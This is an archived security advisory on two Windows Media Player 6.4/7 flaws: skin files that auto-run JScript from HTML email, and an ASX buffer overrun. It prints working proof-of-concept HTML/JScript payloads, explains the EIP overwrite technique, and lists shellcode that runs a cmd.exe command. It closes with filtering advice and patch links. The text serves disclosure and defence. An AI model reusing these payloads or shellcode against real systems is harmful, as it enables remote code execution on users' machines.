COMMAND
MS Media
SYSTEMS AFFECTED
MS Media Player 6.4, 7 (installed by default on WinME)
PROBLEM
Following is based on GFI Security Lab. GFI, developer of email
content checking & network security software, has recently
discovered a security flaw within Windows Media Player which
allows a malicious user to run arbitary code on a target machine
as it attempts to view a website or an HTML E-mail.
The problem is exploited by embedding a javascript (.js) file
within a Media Player skin file (.wmz) which can also be embeded
in a Windows Media Download file (.wmd). This does not require
the user to run any attachments since the Media Player file is
automatically executed using a iframe tag or a window.open() with
in a <script> tag.
Proof of concept Exploit (Embedded within an HTML file or e-mail):
E-mail Example 1.
=================
<head>
<script language="JavaScript">
<!--
function MM_openBrWindow(theURL,winName,features) { //v2.0
alert('This exploit will now open a new window\n
and automatically download the wmd file\n
and execute it. This will create a file named\n
gfiseclab.txt in your C:\\');
window.open(theURL,winName,features);
}
//-->
</script>
</head>
<body bgcolor="#FFFFFF"
onLoad="MM_openBrWindow('http://website/test.wmd','','width=0,height=0')">
</Embedded within an HTML e-mail>
E-mail Example 2.
=================
<html>
<body>
<script>
alert('This exploit will now open a new window \n and automatically download
the wmd file \n
and execute it. This will create a file named \n gfiseclab.txt in your
C:\\')</script>
<iframe src="http://website/test.wmd"></iframe></body>
</html>
test.wmd is a compressed zip file which contains the following
files:
* test.asx: meta file which points to an mpg file and the
exploit skin file
* test.mpg: an example mpeg movie.
* test.wmz: the exploit skin file.
test.wmz is also a compressed zip file containing:
* test.js: our javascript which contains the following code
************************************
var fso, f1;
fso = new ActiveXObject("Scripting.FileSystemObject");
f1 = fso.CreateTextFile("C:\\gfiseclab.txt", true);
function onload(){
playAgain();
}
************************************
* test.wms: another metafile which calls test.js
Following is based on @stake Security Advisory. Microsoft Windows
Media Player plays streaming media files which have the extension
.ASX. There is a buffer overrun caused by the way that WMP deals
with the .ASX file format when using the Web View option in
Windows Explorer (enabled by default). This problem can allow the
execution of arbitrary computer code.
One method of exploitation requires the user to save the .ASX
file down to the local machine and navigate to it via Explorer.
Single clicking once on the file will cause Explorer to
Auto-Preview the destination streaming media file which is
specified in the .ASX file. Passing an overly long destination
to this media file will cause the buffer overrun to occur and the
abtirary code to execute.
This is another good example of why attachments from unknown
sources should not be trusted. Also why systems/network
administrators should evaluate the types of attachments which are
allowed to be passed to users desktops even though they may not
contain any executable code.
There are other methods of exploitation which could allow .ASX
files to be opened automatically when a user visits a malicious
web site. This can be prevented by configuring Internet Explorer
not to run ActiveX controls.
The following file once uncompressed contains
'Explorer-Win2k-BufferOverrun.asx'. Once this file is previewed
within Explorer with a single click, it will cause Microsoft
Explorer to create a file in the root of C: called !test!. This
file will contain a directory listing of the current working
directory when the proof of concept is executed. Once this proof
of concept is executed it will require Explorer.exe to be
restarted.
This example has been hardcoded to work with Windows 2000 (SP1)
and MSVCRT.DLL v6.1.8637. Another reason why this example is
service-pack specific is that the code is randomly located on the
stack (so EIP can not be pointed directly to the location of the
arbitray code), EBX is located 4 bytes before EIP. The example
overwrites EIP with the address of JMP EBX (FF E2, this
instruction is contained in kernel32 and thus static). This in
turn then tries to execute the value at EBX (which containes
NOPs), then EIP (luckly this does not contain any code which
alters or stops program flow) and then finally executes the
arbitry code placed on the stack. The assembly code which is
executed by this example at this point is contained at the end of
this advisory. Within the ASX file the example code is contained
at offset 00005ce4h.
An ASX file which contains the problem is contained in this .zip
file:
http://www.atstake.com/research/advisories/2000/asx-bufferoverrun.zip
<-----<Assembly code for proof of concept>-----
[Byte Code] [Assembly]
90 nop
8B DC mov ebx,esp
8B E3 mov esp,ebx
53 push ebx
8B DC mov ebx,esp
33 FF xor edi,edi
57 push edi
57 push edi
57 push edi
57 push edi
57 push edi
57 push edi
57 push edi
C6 43 E9 63 mov byte ptr [ebx-17h],63h
C6 43 EA 6D mov byte ptr [ebx-16h],6Dh
C6 43 EB 64 mov byte ptr [ebx-15h],64h
C6 43 EC 2E mov byte ptr [ebx-14h],2Eh
C6 43 ED 65 mov byte ptr [ebx-13h],65h
C6 43 EE 78 mov byte ptr [ebx-12h],78h
C6 43 EF 65 mov byte ptr [ebx-11h],65h
C6 43 F0 2F mov byte ptr [ebx-10h],2Fh
C6 43 F1 63 mov byte ptr [ebx-0Fh],63h
C6 43 F2 64 mov byte ptr [ebx-0Eh],64h
C6 43 F3 69 mov byte ptr [ebx-0Dh],69h
C6 43 F4 72 mov byte ptr [ebx-0Ch],72h
C6 43 F5 3E mov byte ptr [ebx-0Bh],3Eh
C6 43 F6 63 mov byte ptr [ebx-0Ah],63h
C6 43 F7 3A mov byte ptr [ebx-9],3Ah
C6 43 F8 5C mov byte ptr [ebx-8],5Ch
C6 43 F9 21 mov byte ptr [ebx-7],21h
C6 43 FA 74 mov byte ptr [ebx-6],74h
C6 43 FB 65 mov byte ptr [ebx-5],65h
C6 43 FC 73 mov byte ptr [ebx-4],73h
C6 43 FD 74 mov byte ptr [ebx-3],74h
C6 43 FE 21 mov byte ptr [ebx-2],21h
B8 AD AA 01 78 mov eax,7801AAADh
50 push eax
8D 43 E9 lea eax,[ebx-17h]
50 push eax
FF 53 E4 call dword ptr [ebx-1Ch]
56 push esi
BB 2D F3 E8 77 mov ebx,77E8F32Dh
FF D3 call ebx
C3 ret
SOLUTION
For e-mail the best solution is to apply filtering on incoming
e-mails via the SMTP server to filter WMD and WMZ files, disable
javascript iframe tags, meta refresh tags and possibly ActiveX
tags. This means that users should not worry about receiving
malicious email and spreading worms etc.
Consider unregistering .wmd and .wmz so from being associated
with Media Player 7 until a vendor patch is applied.
Patch availability:
- Media Player 6.4: http://www.microsoft.com/Downloads/Release.asp?ReleaseID=26069
- Media Player 7: http://www.microsoft.com/Downloads/Release.asp?ReleaseID=26067